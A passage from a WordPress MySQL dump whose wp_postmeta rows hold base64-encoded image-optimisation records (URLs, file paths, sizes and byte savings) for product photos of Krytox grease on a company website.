bGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NzM5MTE2MC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzczOTExNjAtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc3MzkxMTYwLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo0MTksInRpbWUiOjE0ODM1NzU1NDYsImlkIjoxMTI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NzM5MTE2MC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzczOTExNjAtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc3MzkxMTYwLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo0NTYsInRpbWUiOjE0ODM1NzU1NDksImlkIjoxMTI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NzM5MTE2MC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzczOTExNjAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc3MzkxMTYwLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo1MTYsInRpbWUiOjE0ODM1NzU1NTMsImlkIjoxMTI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NzM5MTE2MC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzczOTExNjAtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc3MzkxMTYwLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo1MzQsInRpbWUiOjE0ODM1NzU1NTcsImlkIjoxMTI1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29734, 1118, 'wpfc_optimisation_reduction', '1766524'); 
INSERT INTO `wp_postmeta` VALUES (29735, 1118, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3IuanBnIiwid2lkdGgiOjI2MDAsImhlaWdodCI6MTczMywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3IuanBnIiwicmVkdWN0aW9uIjoxNzY2NTEwLCJ0aW1lIjoxNDgzNTc1NTY4LCJpZCI6IjExMTgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTU3MCwiaWQiOjExMTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1NTc0LCJpZCI6MTExOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzU1NzcsImlkIjoxMTE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItMTYwMHgxMDY2LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci0xNjAweDEwNjYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci0xNjAweDEwNjYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1NTgxLCJpZCI6MTExOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzU1ODMsImlkIjoxMTE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTU4NiwiaWQiOjExMTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1NTg4LCJpZCI6MTExOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzU1OTEsImlkIjoxMTE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1NTkzLCJpZCI6MTExOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTU5NiwiaWQiOjExMTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzU1OTgsImlkIjoxMTE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1NjAwLCJpZCI6MTExOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTYwMywiaWQiOjExMTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3JlYXNlLWVsZWN0cmljLW1vdG9yLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdyZWFzZS1lbGVjdHJpYy1tb3Rvci00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncmVhc2UtZWxlY3RyaWMtbW90b3ItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzU2MDYsImlkIjoxMTE4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29736, 1112, 'wpfc_optimisation_reduction', '20598'); 
INSERT INTO `wp_postmeta` VALUES (29737, 1112, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLmpwZyIsIndpZHRoIjozMjUwLCJoZWlnaHQiOjIxMjMsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzU2MTAsImlkIjoiMTExMiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5OTYsInRpbWUiOjE0ODM1NzU2MTQsImlkIjoxMTEyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC04MDB4NTIzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTIzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC04MDB4NTIzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC04MDB4NTIzLmpwZyIsInJlZHVjdGlvbiI6MjMxOSwidGltZSI6MTQ4MzU3NTYxOSwiaWQiOjExMTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTc2OHg1MDIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MDIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTc2OHg1MDIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTc2OHg1MDIuanBnIiwicmVkdWN0aW9uIjoyMTA1LCJ0aW1lIjoxNDgzNTc1NjIzLCJpZCI6MTExMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLWdyZWFzZS1oaWdoLXRlbXAtMTYwMHgxMDQ1LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNDUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTE2MDB4MTA0NS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLWdyZWFzZS1oaWdoLXRlbXAtMTYwMHgxMDQ1LmpwZyIsInJlZHVjdGlvbiI6NDUzMywidGltZSI6MTQ4MzU3NTYyOCwiaWQiOjExMTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo4MjEsInRpbWUiOjE0ODM1NzU2MzEsImlkIjoxMTEyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1